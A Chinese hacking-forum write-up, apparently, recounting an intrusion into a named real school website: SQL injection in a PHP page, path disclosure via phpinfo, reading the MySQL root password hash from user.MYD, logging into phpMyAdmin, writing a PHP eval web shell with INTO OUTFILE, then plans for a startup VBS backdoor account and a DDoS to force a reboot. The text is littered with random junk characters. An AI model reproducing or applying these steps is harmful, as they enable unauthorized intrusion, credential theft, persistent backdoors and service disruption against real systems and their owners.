第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏+ }, c! d( u; e& m4 O2 q0 N3 ~
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
( h' j0 n$ v# a& \% o! v0 `
2 Q2 o2 V7 M+ y0 h! u* ^+ P5 S) y* u8 H( `" n. \
' R+ L0 ~4 [0 W- B! y' J常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 9 y) X' v9 S9 o" N4 H
9 D+ g0 j* ^) t! @
那么想可以直接写入shell ,getshell有几个条件:3 u2 G$ A' q8 f: c2 f
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
/ }; {+ f9 y! h5 u ]- s3 p% y2 v& j
! s4 m7 ~3 L+ O: G+ h试着爆绝对路径:
; S$ `9 Z$ C) X3 ]1./phpMyAdmin/index.php?lang[]=1 4 e# Q' I2 Q/ e2 Z. l3 h4 Z
2./phpMyAdmin/phpinfo.php ; Q5 J! \- K7 I1 Y- F
3./load_file()
% }- D1 A7 h8 b3 p w4./phpmyadmin/themes/darkblue_orange/layout.inc.php 3 v1 \7 u. z; l/ B4 h
5./phpmyadmin/libraries/select_lang.lib.php 6 x7 P0 y/ m" m
6./phpmyadmin/libraries/lect_lang.lib.php
% ]2 {1 _6 b8 ]' R6 ]2 V# `7./phpmyadmin/libraries/mcrypt.lib.php # \$ v3 H, z6 U) ?; {. V i
8./phpmyadmin/libraries/export/xls.php , O1 V7 M' N* S( E+ h
$ T7 Y4 m- ^2 y/ V" J- u均不行........................... 2 }3 ^( K& h- g# D
& s: j9 Q8 K0 L8 @/ b0 L御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 8 Z/ `2 z% O- c6 U. v' s" k3 s
0 P* ]- _/ s9 \- w7 Z z/ Y8 R. T
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
# d4 w3 h1 _: u' y D- k7 O- C0 H! w P* w d4 G
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ' m+ ^% _& h0 |
+ V1 N. N2 c$ n. q( T敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... ; F6 g. n& u/ e0 u' s# y+ d. _
6 ~9 e; N7 T# L. A想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
. N' q, S: k# \7 p% @! F; T: u8 V! X0 I
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ) {9 L# c7 j" [' T6 K+ D: d: c
, d- A t d' h% R8 L5 t自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
" N" Y. i: i9 c4 k# F
1 ?9 S8 }6 D: a2 V成功读到root密码:
, p/ l0 u% L" m& P& X& O: J: S8 |# X' M! e# I
17---- r(0072)
* W5 u5 i0 B+ {! B- s$ D# Y! p18---- o(006f)
: J+ \8 V3 \) g! P. c- o19---- o(006f)
. N q$ t J0 A1 h4 R5 c. `' X7 G; y8 e20---- t(0074) 2 w$ k0 n! [9 a w. }7 i- B
21---- *(002a) ! s$ z, g7 f( @' D+ Z
22---- 8(0038)
1 U6 Q* p% K* ?23---- 2(0032)
H( c* F4 [7 |( c, [) H0 X0 s6 O24---- E(0045)
% J, e+ H0 P' O n- L25---- 1(0031)
% Q. i$ P" Y) {5 n26---- C(0043)
" K9 b! N. c8 A' q27---- 5(0035) 8 I" V A) i3 @1 e$ Z2 _! w
28---- 8(0038) 4 o8 e: E& W) {( q$ w: |4 a# x
29---- 2(0032) K, A% ~0 v7 S
30---- 8(0038) 8 K# R0 Z' `+ T7 @! c4 s
31---- A(0041)
8 X. _ s' I1 v32---- 9(0039)
/ A3 Y- x5 K; d, A5 L7 h33---- B(0042)
/ x) a( _4 f% z5 b4 M. y34---- 5(0035)
) `. |7 @% F% `( o35---- 4(0034)
S& w& s7 `. ` f36---- 8(0038)
% I2 k5 x1 O) L% l# J, v) b$ a37---- 6(0036)
4 r r% ^. R, N% M38---- 4(0034) , d- x+ i* e2 V) n
39---- 9(0039) 9 k) S; o# R0 \0 i4 o9 M4 b9 H
40---- 1(0031)
9 [( c7 z+ ?- k" T. A8 Y41---- 1(0031) ) S$ u1 {% [; c' F, [
42---- 5(0035)
8 m" M* L0 d* Z2 m' P7 c% J43---- 3(0033) 8 d+ f& u9 }7 O! l* \8 e! |
44---- 5(0035)
0 n' d* G+ g, q6 }* x- ? W; F( S45---- 9(0039) ; [, C- @' i$ m! K
46---- 8(0038)
' x. |- O- M, F1 J5 }47---- F(0046) / w6 K/ o) `0 l6 v0 z0 W
48---- F(0046) 7 K$ o$ W- B. e
49---- 4(0034)
, n* B7 P6 K8 }50---- F(0046)
* I0 L& S2 V3 Y" c" ]$ X* w51---- 0(0030) 5 _9 K) C( {! ?7 W( p
52---- 3(0033)
( { O) s N/ z+ G6 q/ l: N( z53---- 2(0032)
$ O7 J: I7 w8 `54---- A(0041)
7 J! a% q' A7 c55---- 4(0034) . Z6 G. i. @, ?9 [5 k
56---- A(0041) " Z- _ y R4 Z- v+ E
57---- B(0042)
& `6 }9 [3 S, q$ f58---- *(0044)
; p8 P% ^2 X4 U59---- *(0035)
9 _, w6 q" Y9 y# H; O3 P! I60---- *(0041)
0 F: m+ T3 \) J$ q61---- *0032)
! x; F, \' _2 Q; T) K; z* c5 z" M" o9 r \$ L6 z+ R
解密后成功登陆phpmyamin 0 \! x1 E; s: e6 ^: C1 p( S( p$ Q
* P7 p; X0 D* f5 M
1 T0 b. E/ z: G. K ; G$ S9 p1 `+ H" `6 {3 c% N
+ s$ \, _( v- P0 m0 X7 V
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
: a# W; o, a) @* z( m" ]- N* f5 L2 k _; Y
成功执行,拿下shell,菜刀连接: * ^0 I2 K7 t# j4 g6 I* O0 m+ Q4 h
$ s4 w: C! `" G# H
服务器不支持asp,aspx,php提权无果................... 8 P2 ^7 a* f3 U" e
) r; K0 C r# ^
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ' R* V3 @- |) c1 H+ T% S
服务器上已经有个隐藏帐号了 # F# L7 U5 ^9 N
别名 administrators$ G8 |4 V* n# X
注释 管理员对计算机/域有不受限制的完全访问权
2 J$ |4 t. y) J D* m' i7 U e成员 # n' w* |( I3 A, p- H
-------------------------------------------------------------------------------
- w( l9 P$ |: `: m5 j1 e7 yadmin
4 D+ i' n0 X! r6 f$ c9 XAdministrator
7 o9 j- p- y8 V" \slipper$% U/ D5 ^, l& h/ N0 i
sqluser
( \: @7 m, @ ^& _6 T) y命令成功完成。 - ]4 j) [7 Q/ T% g- C! m8 W
& D% O/ q/ a, `: G) Q% t6 G* K
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
8 s( o7 A: ^* _9 t) T, z" y2 r3 O; {# i9 L, _* f$ e" O' Q# `. [+ k: K3 O
ddos服务器重启,不然就只能坐等服务器重启了..............................." y1 }2 m% g6 p( L9 Z- e3 u
$ \0 ?' \6 {3 J" f
8 a% a+ x: a' g6 {0 F |